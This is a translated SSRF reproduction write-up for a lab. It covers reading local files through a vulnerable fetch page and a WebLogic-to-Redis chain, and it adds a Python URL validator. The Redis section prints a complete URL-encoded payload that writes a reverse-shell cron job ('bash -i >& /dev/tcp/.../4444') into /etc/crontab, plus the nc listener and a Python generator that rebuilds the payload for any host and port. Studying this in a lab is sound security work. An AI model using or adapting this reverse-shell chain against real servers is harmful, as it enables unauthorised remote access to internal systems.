SSRF vulnerabilities: vulnerability reproduction

Vulnerability introduction
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker supplies a URL and the server itself then issues the request to that URL.
Vulnerability principle
SSRF usually arises because the server offers a feature that fetches data from another server (fetching web content from a given URL, loading an image from a given address, downloading a file, and so on) without filtering or restricting the destination address.
In general, the goal of SSRF is to reach internal systems that cannot be accessed from the external network: because the request is made by the server, it can target internal hosts that the server can reach but that are isolated from the outside.
Vulnerability impact
1. Port-scan the internal network where the server sits, or the server itself, and collect service banners.
2. Attack applications running on the internal network or on the local host.
3. Fingerprint internal web applications.
4. Identify internal assets and attack internal and external web applications; attacks that can be triggered with a single HTTP GET request (e.g. Struts2, SQL injection) work directly.
5. Read local files using the file:// protocol.
High-risk trigger points
1. Sharing: sharing web content through a URL.
2. Transcoding services: reflowing the page at a given URL for mobile screens.
3. Translation: translating the text at a given URL.
4. Image loading and downloading: fetching or downloading an image from a URL.
5. Image and article collection (bookmarking) features.
Vulnerability reproduction
1. Reading local files with SSRF
Principle
Replace the URL of the page being requested with a URL pointing at a local file path.
Steps
Original URL:
http://localhost/XXE-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/XXE-master/vul/ssrf/ssrf_info/info1.php
Result of the original URL (screenshot in the original post).
Modified URL:
http://localhost/XXE-master/vul/ssrf/ssrf_curl.php?url=file:///C:/Users/Administrator/Desktop/1.txt
Result of the modified URL (screenshot in the original post): the page displays the contents of 1.txt.
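The fix for this trigger point is to validate the destination before the server fetches it. Below is an added Python example (not part of the original write-up or of the ssrf_curl.php code it exercises) of the check a URL fetcher should apply: allow only http/https, resolve the hostname, and refuse anything that lands on a loopback, private, link-local or otherwise non-public address. The function names, the 80/443 port allowlist and the extra blocked range are my assumptions; the candidate URLs are the two from the reproduction above plus constructed variants an attacker would try next.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# The "fetch this URL" feature only needs HTTP(S). file://, dict://, gopher:// etc.
# are what turn an SSRF into local file read or protocol smuggling, so everything
# else is denied by default instead of being blocklisted one scheme at a time.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}   # assumption: the feature never needs other ports

# Ranges that ipaddress does not flag as private on every Python version but that
# are never legitimate targets for a public-facing fetcher.
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]  # carrier-grade NAT


def resolve_host(host):
    """Resolve a hostname or IP literal to every address it maps to.

    Returns an empty list when resolution fails so the caller rejects the URL
    instead of letting curl resolve it differently later."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    # info[4][0] may carry a "%scope" suffix for link-local IPv6 literals.
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def is_internal(addr):
    """True for any address a server-side fetcher must never be pointed at."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped           # ::ffff:127.0.0.1 is still 127.0.0.1
    if any(addr in net for net in EXTRA_BLOCKED):
        return True
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_url(url):
    """Decide whether the fetcher may request `url`. Returns (allowed, reason).

    This is the check that ssrf_curl.php-style code is missing: it runs before
    the URL is handed to curl, not after the response has come back."""
    try:
        parts = urlsplit(url)
        port = parts.port                 # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addrs = resolve_host(parts.hostname)
    if not addrs:
        return False, f"cannot resolve {parts.hostname!r}"
    for addr in addrs:
        if is_internal(addr):
            return False, f"{parts.hostname!r} resolves to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the two URLs from the reproduction above plus variants.
    for candidate in [
        "http://127.0.0.1/XXE-master/vul/ssrf/ssrf_info/info1.php",
        "file:///C:/Users/Administrator/Desktop/1.txt",
        "http://172.22.0.2:6379/",
        "gopher://172.22.0.2:6379/_",
        "http://[::ffff:10.0.0.1]/",
        "http://8.8.8.8/",
    ]:
        print(check_url(candidate), candidate)
```

Two caveats for anyone wiring this into a real fetcher: the address vetted here must be the one actually connected to (resolve once, connect to that IP, set the Host header yourself), otherwise a DNS name that changes answers between the check and the fetch slips through; and every redirect the HTTP client follows is a new destination that has to pass the same check.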
2. Attacking an internal Redis database with SSRF
Environment
Redis 4.0; WebLogic Server 10.0.x
Principle
Use the SSRF vulnerability in WebLogic Server to send HTTP requests to a Redis instance on the internal network, then use the unauthenticated-access weakness of that Redis 4.0 instance to get a shell.
Steps
1. Start an Ubuntu virtual machine and install the vulhub vulnerability environment.
2. Enter the vulhub-master/weblogic/ssrf directory and run docker-compose up -d to start the environment.
3. From the host machine, open http://192.168.16.131:7001/uddiexplorer/SearchPublicRegistries.jsp (192.168.16.131 is the IP of the vulhub VM).
4. Submit a value and capture the request with Burp Suite.
5. Change the URL value in the captured request to point at an internal server and probe for the Redis server (check port 6379); http://172.22.0.2:6379 returns a successful result.
6. Send Redis commands through the SSRF that write a reverse-shell cron entry into /etc/crontab (SET a key whose value is the cron line, CONFIG SET dir /etc/, CONFIG SET dbfilename crontab, SAVE). The cron job connects a shell back to an IP and port of your choosing; here the listener is 192.168.16.131 port 4444, started with nc -lvvp 4444.
URL-encoded Redis commands:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.16.131%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

Sending the commands:
Set the URL to http://172.22.0.2:6379/ followed by the encoded commands (the Redis server's address plus the encoded command string) and send the request. After a short wait, once cron has run the entry, the nc listener on port 4444 receives a shell from the Redis host (172.22.0.2) (screenshots in the original post).
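To see why that encoded string works, here is an added Python model (not from the write-up, vulhub or Redis) that rebuilds the decoded command sequence for any listener, wraps it in the HTTP request the SSRF'ed server puts on the wire, and feeds the result through a minimal imitation of Redis's inline protocol parser. The HTTP headers in wrap_in_http_get and the helper names are assumptions. It shows the three things the payload relies on: Redis treats every line as a separate command and ignores empty lines; the leading `test` and trailing `aaa` absorb the `GET /` and ` HTTP/1.1` that the HTTP client adds around the path, so they become a harmless GET and one rejected line rather than corrupting the real commands; and the literal `\n` sequences inside the double-quoted value are unescaped by Redis, so the cron line is padded with real newlines and cron can still pick it out of the RDB data written to /etc/crontab.

```python
from urllib.parse import quote, unquote

# The URL-encoded payload exactly as it appears in the write-up above.
PAGE_PAYLOAD = (
    "test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i"
    "%20%3E%26%20%2Fdev%2Ftcp%2F192.168.16.131%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22"
    "%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab"
    "%0D%0Asave%0D%0A%0D%0Aaaa"
)


def build_payload(lhost, lport):
    """Rebuild the decoded command sequence for an arbitrary listener.

    The \\n inside the quotes are literal backslash-n (raw string): Redis unescapes
    them when it parses the double-quoted argument, so the cron line is surrounded
    by real newlines and survives the RDB header/footer written around it."""
    cron = rf"\n\n\n\n* * * * * root bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\n\n\n\n"
    return (
        "test\r\n\r\n"                     # absorbs the "GET /" the HTTP client prepends
        f'set 1 "{cron}"\r\n'
        "config set dir /etc/\r\n"
        "config set dbfilename crontab\r\n"
        "save\r\n\r\n"
        "aaa"                              # absorbs the " HTTP/1.1" appended to the path
    )


def wrap_in_http_get(path_payload, host):
    """Bytes the SSRF'ed server sends when told to fetch http://<host>/<path_payload>.

    The decoded CR/LF from the path go out verbatim. The header set is an
    assumption; which headers follow does not matter, Redis rejects them all."""
    return f"GET /{path_payload} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: example\r\n\r\n".encode()


def split_inline_args(line):
    """Minimal model of Redis's inline-protocol tokenizer: whitespace separates
    arguments, double quotes group, and \\n \\r \\t \\\\ \\" are unescaped in quotes."""
    escapes = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", '"': '"'}
    args, i, n = [], 0, len(line)
    while i < n:
        while i < n and line[i].isspace():
            i += 1
        if i >= n:
            break
        if line[i] == '"':
            i += 1
            buf = []
            while i < n and line[i] != '"':
                if line[i] == "\\" and i + 1 < n and line[i + 1] in escapes:
                    buf.append(escapes[line[i + 1]])
                    i += 2
                else:
                    buf.append(line[i])
                    i += 1
            i += 1                         # skip the closing quote
            args.append("".join(buf))
        else:
            start = i
            while i < n and not line[i].isspace():
                i += 1
            args.append(line[start:i])
    return args


# Verbs the model "knows"; anything else gets Redis's -ERR unknown command.
KNOWN_COMMANDS = {"get", "set", "config", "save", "ping", "info"}


def redis_view(wire):
    """Feed raw bytes through the inline-protocol model.

    Returns (executed, rejected): argument lists Redis would execute, and the
    lines it would answer with an error. Empty lines are skipped, which is why
    the extra CRLF padding in the payload costs nothing."""
    executed, rejected = [], []
    for raw in wire.decode("latin-1").split("\n"):
        line = raw.rstrip("\r")
        args = split_inline_args(line)
        if not args:
            continue
        (executed if args[0].lower() in KNOWN_COMMANDS else rejected).append(
            args if args[0].lower() in KNOWN_COMMANDS else line)
    return executed, rejected


if __name__ == "__main__":
    payload = build_payload("192.168.16.131", 4444)
    print("matches write-up:", quote(payload, safe="*") == PAGE_PAYLOAD)
    executed, rejected = redis_view(wrap_in_http_get(payload, "172.22.0.2:6379"))
    for args in executed:
        print("EXEC  ", args)
    for line in rejected:
        print("REJECT", line)
```

The `SAVE` is what does the damage: Redis serialises its dataset to `dir`/`dbfilename`, here /etc/crontab, and cron tolerates the binary junk around the padded line. A Redis this exposed is also what the exploit depends on: since 3.2 Redis starts in protected mode and refuses commands from non-loopback clients unless it is bound explicitly or given a password, so outside a lab the chain needs an instance that was deliberately or carelessly opened up.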

Source: blog.csdn.net/wsnbbz/article/details/104652615